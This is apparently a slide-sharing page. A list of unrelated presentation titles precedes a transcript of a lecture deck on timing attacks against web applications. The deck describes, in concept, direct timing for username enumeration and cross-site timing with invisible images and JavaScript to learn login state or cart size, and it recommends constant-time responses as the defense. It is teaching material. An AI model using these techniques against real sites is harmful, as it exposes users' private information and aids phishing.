Exposing Private Information by Timing Web Applications

Slides:

Advertisements

Similar presentations

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.

Advertisements

Providing protection from potential security threats that exist for any internet-connected computer is termed e- security. It is important to be able to.

Lecture 6/2/12. Forms and PHP The PHP $_GET and $_POST variables are used to retrieve information from forms, like user input When dealing with HTML forms.

1 Configuring Internet- related services (April 22, 2015) © Abdou Illia, Spring 2015.

An Overview of Database Access on the Web An Overview of Database Access on the Web Using ASP and Microsoft Database Technology Sheffield Hallam University.

ASP.NET 2.0 Chapter 6 Securing the ASP.NET Application.

 Proxy Servers are software that act as intermediaries between client and servers on the Internet.  They help users on private networks get information.

Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.

Signatures As Threats to Privacy Brian Neil Levine Assistant Professor Dept. of Computer Science UMass Amherst.

+ Websites Vulnerabilities. + Content Expand of The Internet Use of the Internet Examples Importance of the Internet How to find Security Vulnerabilities.

WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas.

Drive Customer Satisfaction. Cut Costs. Improve Efficiencies. Oracle i Support Chris Kirby Senior Sales Consultant Oracle.

About Dynamic Sites (Front End / Back End Implementations) by Janssen & Associates Affordable Website Solutions for Individuals and Small Businesses.

XHTML Introductory1 Linking and Publishing Basic Web Pages Chapter 3.

5 Chapter Five Web Servers. 5 Chapter Objectives Learn about the Microsoft Personal Web Server Software Learn how to improve Web site performance Learn.

Lecture # 6 Forms, Widgets and Event Handling. Today Questions: From notes/reading/life? Share Personal Web Page (if not too personal) 1.Introduce: How.

Database-Driven Web Sites, Second Edition1 Chapter 5 WEB SERVERS.

COMP3121 E-Commerce Technologies Richard Henson University of Worcester November 2011.

Web Engineering we define Web Engineering as follows: 1) Web Engineering is the application of systematic and proven approaches (concepts, methods, techniques,

Web Application Security ECE ECE Internetwork Security What is a Web Application? An application generally comprised of a collection of scripts.

Top Five Web Application Vulnerabilities Vebjørn Moen Selmersenteret/NoWires.org Norsk Kryptoseminar Trondheim

Web Spoofing Steve Newell Mike Falcon Computer Security CIS 4360.

Chapter 8 Browsing and Searching the Web. 2Practical PC 5 th Edition Chapter 8 Getting Started In this Chapter, you will learn: − What is a Web page −

Web Design (1) Terminology. Coding ‘languages’ (1) HTML - Hypertext Markup Language - describes the content of a web page CSS - Cascading Style Sheets.

How the Web Works Building a Website – Lesson 1. How People Access the Web Browsers People access websites using software called a web browser. To view.

Protecting Browsers from Extension Vulnerabilities Paper by: Adam Barth, Adrienne Porter Felt, Prateek Saxena at University of California, Berkeley and.

Organisations and Data Management 1 Data Collection: Why organisations & individuals acquire data & supply data via websites 2Techniques used by organisations.

ASP-2-1 SERVER AND CLIENT SIDE SCRITPING Colorado Technical University IT420 Tim Peterson.

Session Management Tyler Moore CS7403 University of Tulsa Slides adapted in part or whole from Dan Boneh, Stanford CS155 1.

COEN 350: Network Security E-Commerce Issues. Table of Content HTTP Authentication Cookies.

1 Law, Ethical Impacts, and Internet Security. 2 Legal Issues vs. Ethical Issues Ethics — the branch of philosophy that deals with what is considered.

1 Chapter 22 World Wide Web (HTTP) Chapter 22 World Wide Web (HTTP) Mi-Jung Choi Dept. of Computer Science and Engineering

By Collin Donaldson. Hacking is only legal under the following circumstances: 1.You hack (penetration test) a device/network you own. 2.You gain explicit,

Basics Components of Web Design & Development Basics, Components, Design and Development.

Phishing and Internet Scams. Definitions and recent statistics Why is it dangerous? Phishing techniques and identifiers Examples of phishing and scam.

Exposing Private Information by Timing Web Applications Stephen Kleinheider.

SlideSet #20: Input Validation and Cross-site Scripting Attacks (XSS) SY306 Web and Databases for Cyber Operations.

HTML5 and CSS3 Illustrated Unit E: Inserting and Working with Links.

BUILD SECURE PRODUCTS AND SERVICES

Tonga Institute of Higher Education IT 141: Information Systems

Chapter 8 Browsing and Searching the Web

Instructor: Ahmed Jafer

CISC103 Web Development Basics: Web site:

Ad-blocker circumvention System

Data Virtualization Tutorial… CORS and CIS

Information Security and Privacy Pertaining to Phishing and Internet Scams Brian Corl COSC 316 Information Security and Privacy.

Discover How Your Business Can Benefit from a Facebook Fanpage

Cross-Site Forgery

Whether you decide to use hidden frames or XMLHttp, there are several things you'll need to consider when building an Ajax application. Expanding the role.

Phishing is a form of social engineering that attempts to steal sensitive information.

PHP / MySQL Introduction

Lesson #8 MCTS Cert Guide Microsoft Windows 7, Configuring Chapter 8 Configuring Applications and Internet Explorer.

Database Driven Websites

CISC103 Web Development Basics: Web site:

Auditing Etsy The Security of Etsy

Web Site Development.

Tonga Institute of Higher Education IT 141: Information Systems

Web Systems Development (CSC-215)

Section 14.1 Section 14.2 Identify the technical needs of a Web server

Cross-Site Request Forgery (CSRF) Attack Lab

Configuring Internet-related services

Objectives To understand the about types of computer network

Tonga Institute of Higher Education IT 141: Information Systems

The Internet: Encryption & Public Keys

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems

COMPUTER NETWORKS AND THE INTERNET Chapter 6

Security and JavaScript

Cross Site Request Forgery (CSRF)

Presentation transcript:

Exposing Private Information by Timing Web Applications Stephen Kleinheider

Agenda Introduction to Timing Attacks Direct Timing Attacks – Dealing with Network Noise/Jitter – Username Enumeration – Counting Number of Private Albums in a Gallery Cross-Site Timing Attacks – Techniques and Issues – Test if User is Logged in – Counting Number of Items in User’s Shopping Cart

Introduction to Timing Attacks In general, timing attacks on web applications measure time browser takes to load a given page – By performing a lot of requests, possible to obtain private information by measuring and comparing response times Prevention is possible, but often ignored by web developers Two main types: – Direct Timing Attacks – Cross-Site Timing Attacks

Direct Timing Attacks Measures the time web site takes to respond to HTTP requests Custom program to get very accurate timing data (sub- millisecond) Problems: Dealing with network noise/jitter Example 1: Testing for Boolean Values – Username Enumeration Example 2: Estimating the Size of Hidden Data – Counting Number of Private Albums in a Gallery

Dealing with Network Noise/Jitter Varying network conditions – Long delays, packet loss Server Load – Server handling a great number of requests concurrently Solution: – Statistical analysis of test data to determine jitter – Calculate real data taking into account jitter from test data

Username Enumeration Useful for phishing attacks – Especially when usernames are addresses Possible to use direct timing attacks for username enumeration BadGood

Username Enumeration

Estimating the Size of Hidden Data Timing attacks used to find data sets hidden from certain users How it works: – When displaying data sets, many web applications loop over all data before returning and displaying the applicable data – Possible to calculate timing data with strong correlation to number of items Example: Photo Gallery Blog – Some albums have specific permissions per person – “Private” albums only seen by creator – Develop timing attack to count the number of “private” albums in a gallery

Counting Number of Hidden Albums Much more susceptible to noise Very small difference in response time Requires unusually fast network path to target

Cross-Site Timing Attacks Timing attacks which enable a malicious site to obtain information about the user’s view of another site – Able to time these CSRF attacks even if preventive measures exist – Can be used to test if other CSRF attacks worked Harder to use than direct timing attacks Example 1: Testing for Boolean Values – Test if User is Logged in Example 2: Estimating the Size of Hidden Data – Counting Number of Items in User’s Shopping Cart

Cross-Site Timing Techniques JavaScript: script is allowed to learn when and whether embedded content loads Images are an effective method to timing IMG tags can be used to time any web-accessible url Technique: use invisible image and JavaScript to take several timing samples – Reponses timed via onerror handler

Cross-Site Timing Techniques

Issues with Cross-Site Timing Attacks No stable, known network configuration – User could have any type of connection at almost any geographical location – Absolute timing comparison not useful Solution: Two Sources – Page whose computation time is dependent on hidden data – Page which has as little dependency as possible on hidden data (Baseline)

Determining if a User is Logged in Two Sources: – Test Page – front page of website – Reference Page – “Contact Us” page Able to distinguish between four types of users: – Never been to the site – Been to the site but have never logged in – Currently logged into site – Have logged in sometime in past, but not currently logged in Users who are logged in get redirected –> adding to request time

Determining if a User is Logged in

Estimating Size of Hidden Data Tremendous amount of “countable” data visible only to user – Number of transactions on banking site – Auctions at an auction site – s at popular webmail site – Search results Example: Counting Number of Items in User’s Shopping Cart

Summary Timing attacks on web applications can expose private information Can be used for information gathering and as a first step for phishing attack Both types of timing attacks need to account for network noise/jitter Best Defense = ensure web server always takes a constant amount of time to process request

References usernames.html usernames.html brumley_html/ brumley_html/